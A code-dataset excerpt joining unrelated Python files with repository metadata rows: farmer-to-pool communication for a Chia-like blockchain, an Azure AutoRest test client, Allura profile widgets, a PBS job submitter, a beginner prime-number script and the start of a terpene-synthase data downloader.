self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in GET /farmer {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in GET /farmer {pool_config.pool_url}, {e}"
)
return None
async def _pool_post_farmer(
self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
) -> Optional[Dict]:
post_farmer_payload: PostFarmerPayload = PostFarmerPayload(
pool_config.launcher_id,
get_current_authentication_token(authentication_token_timeout),
pool_config.authentication_public_key,
pool_config.payout_instructions,
None,
)
assert owner_sk.get_g1() == pool_config.owner_public_key
signature: G2Element = AugSchemeMPL.sign(owner_sk, post_farmer_payload.get_hash())
post_farmer_request = PostFarmerRequest(post_farmer_payload, signature)
try:
async with aiohttp.ClientSession() as session:
async with session.post(
f"{pool_config.pool_url}/farmer",
json=post_farmer_request.to_json_dict(),
ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
self.log.info(f"POST /farmer response: {response}")
if "error_code" in response:
self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in POST /farmer {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in POST /farmer {pool_config.pool_url}, {e}"
)
return None
async def _pool_put_farmer(
self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
) -> Optional[Dict]:
put_farmer_payload: PutFarmerPayload = PutFarmerPayload(
pool_config.launcher_id,
get_current_authentication_token(authentication_token_timeout),
pool_config.authentication_public_key,
pool_config.payout_instructions,
None,
)
assert owner_sk.get_g1() == pool_config.owner_public_key
signature: G2Element = AugSchemeMPL.sign(owner_sk, put_farmer_payload.get_hash())
put_farmer_request = PutFarmerRequest(put_farmer_payload, signature)
try:
async with aiohttp.ClientSession() as session:
async with session.put(
f"{pool_config.pool_url}/farmer",
json=put_farmer_request.to_json_dict(),
ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
self.log.info(f"PUT /farmer response: {response}")
if "error_code" in response:
self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in PUT /farmer {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in PUT /farmer {pool_config.pool_url}, {e}"
)
return None
async def update_pool_state(self):
config = load_config(self._root_path, "config.yaml")
pool_config_list: List[PoolWalletConfig] = load_pool_config(self._root_path)
for pool_config in pool_config_list:
p2_singleton_puzzle_hash = pool_config.p2_singleton_puzzle_hash
try:
authentication_sk: Optional[PrivateKey] = await find_authentication_sk(
self.all_root_sks, pool_config.authentication_public_key
)
if authentication_sk is None:
self.log.error(f"Could not find authentication sk for pk: {pool_config.authentication_public_key}")
continue
if p2_singleton_puzzle_hash not in self.pool_state:
self.authentication_keys[bytes(pool_config.authentication_public_key)] = authentication_sk
self.pool_state[p2_singleton_puzzle_hash] = {
"points_found_since_start": 0,
"points_found_24h": [],
"points_acknowledged_since_start": 0,
"points_acknowledged_24h": [],
"next_farmer_update": 0,
"next_pool_info_update": 0,
"current_points": 0,
"current_difficulty": None,
"pool_errors_24h": [],
"authentication_token_timeout": None,
}
self.log.info(f"Added pool: {pool_config}")
pool_state = self.pool_state[p2_singleton_puzzle_hash]
pool_state["pool_config"] = pool_config
# Skip state update when self pooling
if pool_config.pool_url == "":
continue
enforce_https = config["full_node"]["selected_network"] == "mainnet"
if enforce_https and not pool_config.pool_url.startswith("https://"):
self.log.error(f"Pool URLs must be HTTPS on mainnet {pool_config.pool_url}")
continue
# TODO: Improve error handling below, inform about unexpected failures
if time.time() >= pool_state["next_pool_info_update"]:
# Makes a GET request to the pool to get the updated information
pool_info = await self._pool_get_pool_info(pool_config)
if pool_info is not None and "error_code" not in pool_info:
pool_state["authentication_token_timeout"] = pool_info["authentication_token_timeout"]
pool_state["next_pool_info_update"] = time.time() + UPDATE_POOL_INFO_INTERVAL
# Only update the first time from GET /pool_info, gets updated from GET /farmer later
if pool_state["current_difficulty"] is None:
pool_state["current_difficulty"] = pool_info["minimum_difficulty"]
if time.time() >= pool_state["next_farmer_update"]:
authentication_token_timeout = pool_state["authentication_token_timeout"]
async def update_pool_farmer_info() -> Tuple[Optional[GetFarmerResponse], Optional[bool]]:
# Run a GET /farmer to see if the farmer is already known by the pool
response = await self._pool_get_farmer(
pool_config, authentication_token_timeout, authentication_sk
)
farmer_response: Optional[GetFarmerResponse] = None
farmer_known: Optional[bool] = None
if response is not None:
if "error_code" not in response:
farmer_response = GetFarmerResponse.from_json_dict(response)
if farmer_response is not None:
pool_state["current_difficulty"] = farmer_response.current_difficulty
pool_state["current_points"] = farmer_response.current_points
pool_state["next_farmer_update"] = time.time() + UPDATE_POOL_FARMER_INFO_INTERVAL
else:
farmer_known = response["error_code"] != PoolErrorCode.FARMER_NOT_KNOWN.value
self.log.error(
"update_pool_farmer_info failed: "
f"{response['error_code']}, {response['error_message']}"
)
return farmer_response, farmer_known
if authentication_token_timeout is not None:
farmer_info, farmer_is_known = await update_pool_farmer_info()
if farmer_info is None and farmer_is_known is not None and not farmer_is_known:
# Make the farmer known on the pool with a POST /farmer
owner_sk = await find_owner_sk(self.all_root_sks, pool_config.owner_public_key)
post_response = await self._pool_post_farmer(
pool_config, authentication_token_timeout, owner_sk
)
if post_response is not None and "error_code" not in post_response:
self.log.info(
f"Welcome message from {pool_config.pool_url}: "
f"{post_response['welcome_message']}"
)
# Now we should be able to update the local farmer info
farmer_info, farmer_is_known = await update_pool_farmer_info()
if farmer_info is None and not farmer_is_known:
self.log.error("Failed to update farmer info after POST /farmer.")
# Update the payout instructions on the pool if required
if (
farmer_info is not None
and pool_config.payout_instructions.lower() != farmer_info.payout_instructions.lower()
):
owner_sk = await find_owner_sk(self.all_root_sks, pool_config.owner_public_key)
put_farmer_response_dict = await self._pool_put_farmer(
pool_config, authentication_token_timeout, owner_sk
)
try:
# put_farmer_response: PutFarmerResponse = PutFarmerResponse.from_json_dict(
# put_farmer_response_dict
# )
# if put_farmer_response.payout_instructions:
# self.log.info(
# f"Farmer information successfully updated on the pool {pool_config.pool_url}"
# )
# TODO: Fix Streamable implementation and recover the above.
if put_farmer_response_dict["payout_instructions"]:
self.log.info(
f"Farmer information successfully updated on the pool {pool_config.pool_url}"
)
else:
raise Exception
except Exception:
self.log.error(
f"Failed to update farmer information on the pool {pool_config.pool_url}"
)
else:
self.log.warning(
f"No pool specific authentication_token_timeout has been set for {p2_singleton_puzzle_hash}"
f", check communication with the pool."
)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Exception in update_pool_state for {pool_config.pool_url}, {e} {tb}")
def get_public_keys(self):
return [child_sk.get_g1() for child_sk in self._private_keys]
def get_private_keys(self):
return self._private_keys
async def get_reward_targets(self, search_for_private_key: bool) -> Dict:
if search_for_private_key:
all_sks = await self.get_all_private_keys()
stop_searching_for_farmer, stop_searching_for_pool = False, False
for i in range(500):
if stop_searching_for_farmer and stop_searching_for_pool and i > 0:
break
for sk, _ in all_sks:
ph = create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1())
if ph == self.farmer_target:
stop_searching_for_farmer = True
if ph == self.pool_target:
stop_searching_for_pool = True
return {
"farmer_target": self.farmer_target_encoded,
"pool_target": self.pool_target_encoded,
"have_farmer_sk": stop_searching_for_farmer,
"have_pool_sk": stop_searching_for_pool,
}
return {
"farmer_target": self.farmer_target_encoded,
"pool_target": self.pool_target_encoded,
}
def set_reward_targets(self, farmer_target_encoded: Optional[str], pool_target_encoded: Optional[str]):
config = load_config(self._root_path, "config.yaml")
if farmer_target_encoded is not None:
self.farmer_target_encoded = farmer_target_encoded
self.farmer_target = decode_puzzle_hash(farmer_target_encoded)
config["farmer"]["xkm_target_address"] = farmer_target_encoded
if pool_target_encoded is not None:
self.pool_target_encoded = pool_target_encoded
self.pool_target = decode_puzzle_hash(pool_target_encoded)
config["pool"]["xkm_target_address"] = pool_target_encoded
save_config(self._root_path, "config.yaml", config)
async def set_payout_instructions(self, launcher_id: bytes32, payout_instructions: str):
for p2_singleton_puzzle_hash, pool_state_dict in self.pool_state.items():
if launcher_id == pool_state_dict["pool_config"].launcher_id:
config = load_config(self._root_path, "config.yaml")
new_list = []
for list_element in config["pool"]["pool_list"]:
if hexstr_to_bytes(list_element["launcher_id"]) == bytes(launcher_id):
list_element["payout_instructions"] = payout_instructions
new_list.append(list_element)
config["pool"]["pool_list"] = new_list
save_config(self._root_path, "config.yaml", config)
# Force a GET /farmer which triggers the PUT /farmer if it detects the changed instructions
pool_state_dict["next_farmer_update"] = 0
return
self.log.warning(f"Launcher id: {launcher_id} not found")
async def generate_login_link(self, launcher_id: bytes32) -> Optional[str]:
for pool_state in self.pool_state.values():
pool_config: PoolWalletConfig = pool_state["pool_config"]
if pool_config.launcher_id == launcher_id:
authentication_sk: Optional[PrivateKey] = await find_authentication_sk(
self.all_root_sks, pool_config.authentication_public_key
)
if authentication_sk is None:
self.log.error(f"Could not find authentication sk for pk: {pool_config.authentication_public_key}")
continue
assert authentication_sk.get_g1() == pool_config.authentication_public_key
authentication_token_timeout = pool_state["authentication_token_timeout"]
authentication_token = get_current_authentication_token(authentication_token_timeout)
message: bytes32 = std_hash(
AuthenticationPayload(
"get_login", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
)
)
signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
return (
pool_config.pool_url
+ f"/login?launcher_id={launcher_id.hex()}&authentication_token={authentication_token}"
f"&signature={bytes(signature).hex()}"
)
return None
async def update_cached_harvesters(self) -> bool:
# First remove outdated cache entries
self.log.debug(f"update_cached_harvesters cache entries: {len(self.harvester_cache)}")
remove_hosts = []
for host, host_cache in self.harvester_cache.items():
remove_peers = []
for peer_id, peer_cache in host_cache.items():
# If the peer cache is expired it means the harvester didn't respond for too long
if peer_cache.expired():
remove_peers.append(peer_id)
for key in remove_peers:
del host_cache[key]
if len(host_cache) == 0:
self.log.debug(f"update_cached_harvesters remove host: {host}")
remove_hosts.append(host)
for key in remove_hosts:
del self.harvester_cache[key]
# Now query each harvester and update caches
updated = False
for connection in self.server.get_connections(NodeType.HARVESTER):
cache_entry = await self.get_cached_harvesters(connection)
if cache_entry.needs_update():
self.log.debug(f"update_cached_harvesters update harvester: {connection.peer_node_id}")
cache_entry.bump_last_update()
response = await connection.request_plots(
harvester_protocol.RequestPlots(), timeout=UPDATE_HARVESTER_CACHE_INTERVAL
)
if response is not None:
if isinstance(response, harvester_protocol.RespondPlots):
new_data: Dict = response.to_json_dict()
if cache_entry.data != new_data:
updated = True
self.log.debug(f"update_cached_harvesters cache updated: {connection.peer_node_id}")
else:
self.log.debug(f"update_cached_harvesters no changes for: {connection.peer_node_id}")
cache_entry.set_data(new_data)
else:
self.log.error(
f"Invalid response from harvester:"
f"peer_host {connection.peer_host}, peer_node_id {connection.peer_node_id}"
)
else:
self.log.error(
"Harvester did not respond. You might need to update harvester to the latest version"
)
return updated
async def get_cached_harvesters(self, connection: WSMintConnection) -> HarvesterCacheEntry:
host_cache = self.harvester_cache.get(connection.peer_host)
if host_cache is None:
host_cache = {}
self.harvester_cache[connection.peer_host] = host_cache
node_cache = host_cache.get(connection.peer_node_id.hex())
if node_cache is None:
node_cache = HarvesterCacheEntry()
host_cache[connection.peer_node_id.hex()] = node_cache
return node_cache
async def get_harvesters(self) -> Dict:
harvesters: List = []
for connection in self.server.get_connections(NodeType.HARVESTER):
self.log.debug(f"get_harvesters host: {connection.peer_host}, node_id: {connection.peer_node_id}")
cache_entry = await self.get_cached_harvesters(connection)
if cache_entry.data is not None:
harvester_object: dict = dict(cache_entry.data)
harvester_object["connection"] = {
"node_id": connection.peer_node_id.hex(),
"host": connection.peer_host,
"port": connection.peer_port,
}
harvesters.append(harvester_object)
else:
self.log.debug(f"get_harvesters no cache: {connection.peer_host}, node_id: {connection.peer_node_id}")
return {"harvesters": harvesters}
async def _periodically_update_pool_state_task(self):
time_slept: uint64 = uint64(0)
config_path: Path = config_path_for_filename(self._root_path, "config.yaml")
while not self._shut_down:
# Every time the config file changes, read it to check the pool state
stat_info = config_path.stat()
if stat_info.st_mtime > self.last_config_access_time:
# If we detect the config file changed, refresh private keys first just in case
self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
self.last_config_access_time = stat_info.st_mtime
await self.update_pool_state()
time_slept = uint64(0)
elif time_slept > 60:
await self.update_pool_state()
time_slept = uint64(0)
time_slept += 1
await asyncio.sleep(1)
async def _periodically_clear_cache_and_refresh_task(self):
time_slept: uint64 = uint64(0)
refresh_slept = 0
while not self._shut_down:
try:
if time_slept > self.constants.SUB_SLOT_TIME_TARGET:
now = time.time()
removed_keys: List[bytes32] = []
for key, add_time in self.cache_add_time.items():
if now - float(add_time) > self.constants.SUB_SLOT_TIME_TARGET * 3:
self.sps.pop(key, None)
self.proofs_of_space.pop(key, None)
self.quality_str_to_identifiers.pop(key, None)
self.number_of_responses.pop(key, None)
removed_keys.append(key)
for key in removed_keys:
self.cache_add_time.pop(key, None)
time_slept = uint64(0)
log.debug(
f"Cleared farmer cache. Num sps: {len(self.sps)} {len(self.proofs_of_space)} "
f"{len(self.quality_str_to_identifiers)} {len(self.number_of_responses)}"
)
time_slept += 1
refresh_slept += 1
# Periodically refresh GUI to show the correct download/upload rate.
if refresh_slept >= 30:
self.state_changed("add_connection", {})
refresh_slept = 0
# Handles harvester plots cache cleanup and updates
if await self.update_cached_harvesters():
self.state_changed("new_plots", await self.get_harvesters())
except Exception:
log.error(f"_periodically_clear_cache_and_refresh_task failed: {traceback.format_exc()}")
await asyncio.sleep(1)
| 49.462291 | 120 | 0.603388 |
16f34d8cbe946d52c2c85424b2394d290c268d03 | 350 | py | Python | pass3/exceptions.py | akesterson/pass3 | b2b125ca5b548665de60ace549ed34f692d541b2 | [
"MIT"
] | 1 | 2016-01-07T00:17:47.000Z | 2016-01-07T00:17:47.000Z | pass3/exceptions.py | akesterson/pass3 | b2b125ca5b548665de60ace549ed34f692d541b2 | [
"MIT"
] | null | null | null | pass3/exceptions.py | akesterson/pass3 | b2b125ca5b548665de60ace549ed34f692d541b2 | [
"MIT"
] | null | null | null | class DecryptionError(Exception):
"""
An error occurred while trying to decrypt a message
"""
pass
class EncryptionError(Exception):
"""
An error occurred while trying to encrypt a message
"""
pass
class PasswordException(Exception):
"""
An error occurred while checking the user's password
"""
pass
| 19.444444 | 56 | 0.66 |
cf0de7931452353e32f8a72f2240f5253cdcffa8 | 756 | py | Python | .history/List of Capstone Projects/next_prime_number_20200517103139.py | EvanthiosPapadopoulos/Python3 | ab773fd458e365c1510f98ecac65965234c881e8 | [
"MIT"
] | 1 | 2020-05-18T17:50:00.000Z | 2020-05-18T17:50:00.000Z | .history/List of Capstone Projects/next_prime_number_20200517103139.py | EvanthiosPapadopoulos/Python3 | ab773fd458e365c1510f98ecac65965234c881e8 | [
"MIT"
] | null | null | null | .history/List of Capstone Projects/next_prime_number_20200517103139.py | EvanthiosPapadopoulos/Python3 | ab773fd458e365c1510f98ecac65965234c881e8 | [
"MIT"
] | null | null | null | '''
Next Prime Number - Have the program find prime numbers until the user chooses to stop asking for the next one.
'''
import HeaderOfFiles
my_list = []
number = 1
while True:
x = input("Give me next prime number or type 's' to stop programm: ")
if x == 's':
break
else:
i = 2
number += 1
while i > 0:
new_num = number
if new_num % i == 0:
if i not in my_list:
my_list.append(i)
print("Next Prime Number is: {}".format(i))
break
else:
number += 1
# new_num = new_num/i
# i = 2
else:
i += 1
| 24.387097 | 111 | 0.435185 |
7dd6bcb7d123f2574742e3a89e2b8c6771d98339 | 3,120 | py | Python | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/CustomBaseUri/fixtures/acceptancetestscustombaseuri/auto_rest_parameterized_host_test_client.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | 1 | 2017-08-27T07:40:09.000Z | 2017-08-27T07:40:09.000Z | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/CustomBaseUri/fixtures/acceptancetestscustombaseuri/auto_rest_parameterized_host_test_client.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | null | null | null | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/CustomBaseUri/fixtures/acceptancetestscustombaseuri/auto_rest_parameterized_host_test_client.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | 1 | 2019-07-20T12:20:03.000Z | 2019-07-20T12:20:03.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import ServiceClient
from msrest import Serializer, Deserializer
from msrestazure import AzureConfiguration
from .version import VERSION
from .operations.paths_operations import PathsOperations
from . import models
class AutoRestParameterizedHostTestClientConfiguration(AzureConfiguration):
"""Configuration for AutoRestParameterizedHostTestClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param host: A string value that is used as a global part of the
parameterized host
:type host: str
"""
def __init__(
self, credentials, host):
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
if host is None:
raise ValueError("Parameter 'host' must not be None.")
if not isinstance(host, str):
raise TypeError("Parameter 'host' must be str.")
base_url = 'http://{accountName}{host}'
super(AutoRestParameterizedHostTestClientConfiguration, self).__init__(base_url)
self.add_user_agent('autorestparameterizedhosttestclient/{}'.format(VERSION))
self.add_user_agent('Azure-SDK-For-Python')
self.credentials = credentials
self.host = host
class AutoRestParameterizedHostTestClient(object):
"""Test Infrastructure for AutoRest
:ivar config: Configuration for client.
:vartype config: AutoRestParameterizedHostTestClientConfiguration
:ivar paths: Paths operations
:vartype paths: .operations.PathsOperations
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param host: A string value that is used as a global part of the
parameterized host
:type host: str
"""
def __init__(
self, credentials, host):
self.config = AutoRestParameterizedHostTestClientConfiguration(credentials, host)
self._client = ServiceClient(self.config.credentials, self.config)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self.api_version = '1.0.0'
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.paths = PathsOperations(
self._client, self.config, self._serialize, self._deserialize)
| 37.590361 | 89 | 0.689423 |
36c95b740494d3cd27df386e12dbbdb0f563d570 | 631 | py | Python | submit_jobs.py | christiangil/Optimization-Tutorial | 22091fd5784978b6ac27406ecfa78c8c717400f0 | [
"MIT"
] | 2 | 2020-03-16T16:39:07.000Z | 2020-03-16T20:34:08.000Z | submit_jobs.py | christiangil/Optimization-Tutorial | 22091fd5784978b6ac27406ecfa78c8c717400f0 | [
"MIT"
] | null | null | null | submit_jobs.py | christiangil/Optimization-Tutorial | 22091fd5784978b6ac27406ecfa78c8c717400f0 | [
"MIT"
] | null | null | null | #This script submits jobs to ICS-ACI
import os
import os.path
import glob
import numpy as np
def submit_job(path, job_name):
os.system('mv %s %s'%(path, job_name))
os.system('qsub %s'%job_name)
os.system('mv %s %s'%(job_name,path))
###############################
Njobs_counter = 0
script_dir = os.path.dirname(os.path.realpath(__file__))
jobs_dir = "jobs/"
os.chdir(jobs_dir)
job_names = glob.glob("*.pbs")
os.chdir(script_dir)
for job_name in job_names:
print(job_name)
path = jobs_dir + job_name
submit_job(path, job_name)
Njobs_counter += 1
print('found and submitted %d jobs'%(Njobs_counter)) | 22.535714 | 56 | 0.66878 |
ee0d65254f690b3291152fecbfee5df7339b6aed | 5,640 | py | Python | Allura/allura/lib/widgets/user_profile.py | apache/allura | 6184203235ac6f83c943fae7fd3fef54678f9ed7 | [
"Apache-2.0"
] | 113 | 2015-03-25T10:33:37.000Z | 2022-02-16T20:55:06.000Z | Allura/allura/lib/widgets/user_profile.py | apache/allura | 6184203235ac6f83c943fae7fd3fef54678f9ed7 | [
"Apache-2.0"
] | 4 | 2017-08-04T16:19:07.000Z | 2020-06-08T19:01:33.000Z | Allura/allura/lib/widgets/user_profile.py | apache/allura | 6184203235ac6f83c943fae7fd3fef54678f9ed7 | [
"Apache-2.0"
] | 36 | 2015-08-14T16:27:39.000Z | 2022-02-16T20:54:35.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
from __future__ import absolute_import
import logging
import re
import ew as ew_core
import ew.jinja2_ew as ew
from jinja2 import Markup
from paste.deploy.converters import asbool
import tg
from tg import app_globals as g
from tg import request
from tg import tmpl_context as c
from allura.lib import helpers as h
from allura.lib import validators as v
from allura.lib.plugin import AuthenticationProvider
from .forms import ForgeForm
log = logging.getLogger(__name__)
class SendMessageForm(ForgeForm):
template = 'jinja:allura.ext.user_profile:templates/send_message_form.html'
submit_text = 'Send Message'
class fields(ew_core.NameList):
subject = ew.TextField(
validator=v.UnicodeString(
not_empty=True,
messages={'empty': "You must provide a Subject"}),
attrs=dict(
placeholder='Enter your subject here',
title='Enter your subject here',
style='width: 425px'),
label='Subject')
message = ew.TextArea(
validator=v.UnicodeString(
not_empty=True,
messages={'empty': "You must provide a Message"}),
attrs=dict(
placeholder='Enter your message here',
title='Enter your message here',
style='width: 425px; height:200px'),
label='Message')
cc = ew.Checkbox(label='Send me a copy')
reply_to_real_address = ew.Checkbox(label='Include my email address in the reply field for this message')
class SectionsUtil(object):
@staticmethod
def load_sections(app):
sections = {}
for ep in h.iter_entry_points('allura.%s.sections' % app):
sections[ep.name] = ep.load()
section_ordering = tg.config.get('%s_sections.order' % app, '')
ordered_sections = []
for section in re.split(r'\s*,\s*', section_ordering):
if section in sections:
ordered_sections.append(sections.pop(section))
sections = ordered_sections + list(sections.values())
return sections
class SectionBase(object):
"""
This is the base class for sections in Profile tool and Dashboard.
"""
template = ''
def __init__(self, user):
"""
Creates a section for the given :param:`user`. Stores the values as attributes of
the same name.
"""
self.user = user
self.context = None
def check_display(self):
"""
Should return True if the section should be displayed.
"""
return True
def prepare_context(self, context):
"""
Should be overridden to add any values to the template context prior
to display.
"""
return context
def setup_context(self):
self.context = self.prepare_context({
'h': h,
'c': c,
'g': g,
'user': self.user,
'config': tg.config,
'auth': AuthenticationProvider.get(request),
})
def display(self, *a, **kw):
"""
Renders the section using the context from :meth:`prepare_context`
and the :attr:`template`, if :meth:`check_display` returns True.
If overridden or this base class is not used, this method should
return either plain text (which will be escaped) or a `jinja2.Markup`
instance.
"""
if not self.check_display():
return ''
try:
tmpl = g.jinja2_env.get_template(self.template)
if not self.context:
self.setup_context()
return Markup(tmpl.render(self.context))
except Exception as e:
log.exception('Error rendering section %s: %s', type(self).__name__, e)
if asbool(tg.config.get('debug')):
raise
else:
return ''
class ProjectsSectionBase(SectionBase):
def get_projects(self):
return [
project
for project in self.user.my_projects()
if project != c.project
and (self.user == c.user or h.has_access(project, 'read'))
and not project.is_nbhd_project
and not project.is_user_project]
def prepare_context(self, context):
context['projects'] = self.get_projects()
return context
def __json__(self):
projects = [
dict(
name=project['name'],
url=project.url(),
summary=project['summary'],
last_updated=project['last_updated'])
for project in self.get_projects()]
return dict(projects=projects)
| 33.176471 | 113 | 0.608333 |
f651d89b03c83d884b638967d7e8017bfa8be1d0 | 108,828 | py | Python | TPSdownloader.py | mmokrejs/TPSdownloader | 08498feb8125ebd7ffeed159403a1f3eb5866cee | [
"MIT"
] | null | null | null | TPSdownloader.py | mmokrejs/TPSdownloader | 08498feb8125ebd7ffeed159403a1f3eb5866cee | [
"MIT"
] | null | null | null | TPSdownloader.py | mmokrejs/TPSdownloader | 08498feb8125ebd7ffeed159403a1f3eb5866cee | [
"MIT"
] | null | null | null | #! /usr/bin/python3
import sys
import os
import datetime
import numpy as np
import pandas as pd
from shlex import split as shlex_split
from subprocess import Popen, PIPE, call #, STDOUT
from optparse import OptionParser
import xml.etree.ElementTree as ET
import time
import re
# from re import compile, findall, finditer, sub, IGNORECASE
import copy
from itertools import chain
import gzip
from natsort import natsorted
try:
from rdkit import Chem
# not available (yet) in Gentoo
# https://rdkit.readthedocs.io/en/latest/Install.html
except ImportError:
Chem = None
version = "20210717"
myparser = OptionParser(version="%s version %s" % ('%prog', version))
myparser.add_option("--uniprot-ids-from-file", action="store", type="string", dest="uniprot_ids_from_file", default='',
help="Obtain a list of Uniprot IDs from column 'Uniprot ID' in 'Sheet1'.")
myparser.add_option("--uniprot-id-file", action="store", type="string", dest="uniprot_idfile", default='-',
help="Obtain list of Uniprot IDs from a single-column text file or STDIN, is mutually exclusive with --chebi-id-file.")
myparser.add_option("--chebi-id-file", action="store", type="string", dest="chebi_idfile", default='-',
help="Obtain a list of ChEBI IDs from a single-column text file or STDIN, is mutually exclusive with --uniprot-id-file.")
myparser.add_option("--uniprot-id", action="store", type="string", dest="uniprot_id", default=None,
help="List of Uniprot IDs, is mutually exclusive with --chebi-id.")
myparser.add_option("--chebi-id", action="store", type="string", dest="chebi_id", default=None,
help="List of ChEBI IDs, is mutually exclusive with --uniprot-id.")
myparser.add_option("--run-mode", action="store", type="string", dest="run_mode", default='terpene_synthases',
help="Run type mode: [terpene_synthases, CYPs] (default: terpene_synthases).")
myparser.add_option("--xls-storage", action="store", type="string", dest="xls_storage", default="TPSdownloader.xls",
help="Use this file to parse input data and also as an output file with new results appended to it. Use None to disable the default. Default is TPSdownloader.xls.")
myparser.add_option("--already-curated-id-from-file", action="store", type="string", dest="already_curated_idfile", default=None,
help="Obtain list of already curated Uniprot IDs from a single-column text file or STDIN, default None. These IDs will not appear in the list of newly annotated proteins still to be added to our manually curated table.")
myparser.add_option("--outfmt", action="store", type="string", dest="outfmt", default="xls",
help="Format of output file. It is used to preserve data between restarts too. CSV or XLSX (default)")
myparser.add_option("--verbose", action="store", type="int", dest="verbose", default=0,
help="Set verbosity to some value default is zero")
myparser.add_option("--debug", action="store", type="int", dest="debug", default=0,
help="Set debug to some value")
(myoptions, myargs) = myparser.parse_args()
extra_product_colnames = ['Name of product', 'Product compound description', 'Chemical formula of product', 'SMILES of product (including stereochemistry)']
extra_substrate_colnames = ['Substrate (including stereochemistry)', 'Substrate compound description', 'Chemical formula of substrate', 'SMILES of substrate (including stereochemistry)']
# extra_intermediate_colnames = ['Name of intermediate', 'Intermediate compound description', 'Chemical formula of intermediate', 'SMILES of intermediate (including stereochemistry)']
substrates = set(['CHEBI:17211', 'CHEBI:14299', 'CHEBI:5332', 'CHEBI:42877', 'CHEBI:24223', 'CHEBI:58635', 'CHEBI:30939', 'CHEBI:10760', 'CHEBI:29558', 'CHEBI:57907', 'CHEBI:58756', 'CHEBI:58057', 'CHEBI:162247', 'CHEBI:60374', 'CHEBI:138307', 'CHEBI:61984', 'CHEBI:64801', 'CHEBI:15441', 'CHEBI:18728', 'CHEBI:11026', 'CHEBI:11072', 'CHEBI:372', 'CHEBI:58206', 'CHEBI:138223', 'CHEBI:138807', 'CHEBI:58553', 'CHEBI:57533', 'CHEBI:7525', 'CHEBI:138305', 'CHEBI:15440', 'CHEBI:10843', 'CHEBI:9245', 'CHEBI:10795', 'CHEBI:15104', 'CHEBI:26746', 'CHEBI:175763', 'CHEBI:17407', 'CHEBI:12874', 'CHEBI:11491', 'CHEBI:42496', 'CHEBI:10700', 'CHEBI:11488', 'CHEBI:12854', 'CHEBI:19789', 'CHEBI:138890', 'CHEBI:138232'])
# CHEBI:17211 CHEBI:14299, CHEBI:5332, CHEBI:42877, CHEBI:24223 GPP
# CHEBI:58635 nebo CHEBI:30939 CHEBI:10760, CHEBI:29558 (+)-copalyl diphosphate, actually an intermediate of H8ZM70
# CHEBI:57907 (2E,6E,10E,14E)-GFPP
# CHEBI:58756 (2E,6E,10E)-GGPP
# CHEBI:58057 (2E)-GPP aka geranyl diphosphate(3โ)
# CHEBI:162247 (2Z,6E)-FPP
# CHEBI:60374 (2Z,6Z)-FPP
# CHEBI:138307 (3S,22S)-2,3:22,23-diepoxy-2,3,22,23-tetrahydrosqualene
# CHEBI:61984 (E)-2-MeGPP alias (E)-2-methylgeranyl diphosphate
# CHEBI:64801 (R)-tetraprenyl-ฮฒ-curcumene
# CHEBI:15441 CHEBI:18728, CHEBI:11026, CHEBI:11072, CHEBI:372 (S)-2,3-epoxysqualene
# CHEBI:58206 all-trans-heptaprenyl PP
# CHEBI:138223 ent-copal-8-ol diphosphate(3โ)
